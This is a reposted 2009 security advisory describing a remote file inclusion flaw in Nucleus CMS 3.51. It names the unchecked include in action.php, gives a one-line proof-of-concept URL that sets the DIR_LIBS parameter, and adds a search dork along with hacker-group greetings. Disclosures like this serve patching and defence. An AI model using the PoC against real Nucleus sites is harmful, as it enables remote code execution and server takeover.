Nucleus CMS 3.51 remote file inclusion

2009.12.09
Credit: Don Tukulesto
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

/************************************************************************** [!] Nucleus CMS Remote File Include Vulneralbility [!] Author : Don Tukulesto (root@indonesiancoder.com) [!] Homepage : http://www.indonesiancoder.com [!] Date : November 30, 2009 [!] Tune In : http://antisecradio.fm (choose your weapon) **************************************************************************/ [ Software Information ] [+] Nucleus: PHP/MySQL Weblog CMS (http://nucleuscms.org/) [+] Download : http://sourceforge.net/projects/nucleuscms/files/ [+] Version() : 3.51 [+] Nucleus allows you to easily maintain your own weblog(s) on your own server. It offers a system that is easy to install, but still offers maximum flexibility. [+] Method : Remote File Inclusion [+] Dork : "Don Tukulesto is LAMMER" =========================================================================== [ Vulnerable File ] [+] action.php Fatal error on line 25 include_once($DIR_LIBS . 'ACTION.php'); [ Proof of Concept ] http://127.0.0.1/action.php?DIR_LIBS=[INDONESIANCODER-666] =========================================================================== [ Who The Hell Has Control of That Damn Smoke Machine ] [~] INDONESIAN CODER TEAM - KILL-9 CREW - MainHack Brotherhood - ServerIsDown [~] kaMtiEz, M3NW5, arianom, Contrex, tiw0L, Pathloader, abah_benu, Saint, Cyb3r_tr0n, M364TR0N, VycOd, [~] Jack-, Yadoy666 + miya666, s4va, senot, Bayu5154, Gonzhack, Tucker, Ian Petrucii, Ronz & FeeLCoMz [~] kecemplungkalen, DraCoola Multimedia, XNITRO, rey_cute, Awan Bejat, Plaque, Gh4mb4s and YOU!! [ rm -rf yourself ] [>] FOR MALINGSIAL [ Note ] [+] Rest In Peace R.T.O AKA SATAN BLASTED [+] Thank you to ALL OF YOU called me piece of shit, especially for High school friends


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top